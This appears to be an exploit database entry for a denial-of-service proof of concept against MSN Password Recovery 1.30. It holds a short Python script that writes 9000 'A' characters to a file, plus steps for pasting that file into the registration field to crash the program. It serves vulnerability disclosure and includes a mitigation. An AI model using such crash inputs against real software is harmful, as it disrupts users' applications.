MSN Password Recovery 1.30 - Denial of Service (PoC)

vendor:

MSN Password Recovery

by:

Gokkulraj

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: MSN Password Recovery

Affected Version From: 1.30

Affected Version To: 1.30

Patch Exists: NO

Related CWE: N/A

CPE: a:top-password:msn_password_recovery

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x64

2020

MSN Password Recovery 1.30 – Denial of Service (PoC)

MSN Password Recovery is vulnerable to a denial of service attack when a maliciously crafted User Name and Registration Code is entered into the application. An attacker can exploit this vulnerability by creating a file containing a large number of 'A' characters, and then pasting the contents of the file into the User Name and Registration Code field. This will cause the application to crash.

Mitigation:

Ensure that input validation is performed on all user-supplied data to prevent maliciously crafted data from causing a denial of service.

Source

Exploit-DB raw data:

# Exploit Title: MSN Password Recovery 1.30 - Denial of Service (PoC)
# Date: 2020-01-02
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/MSNPRSetup.exe
# Exploit Author: Gokkulraj
# Tested Version: v1.30
# Tested on: Windows 7 x64

# 1.- Download and install MSN Password Recovery
# 2.- Run python code : MSN Password Recovery.py
# 3.- Open CRASH.txt and copy content to clipboard
# 4.- Open MSN Password Recovery and Click 'EnterKey'
# 5.- Paste the content of CRASH.txt into the Field: 'User Name and
Registration Code'
# 6.- click 'OK' you will see a crash.

#!/usr/bin/env python
Dos= "\x41" * 9000
myfile=open('CRASH.txt','w')
myfile.writelines(Dos)
myfile.close()
print("File created")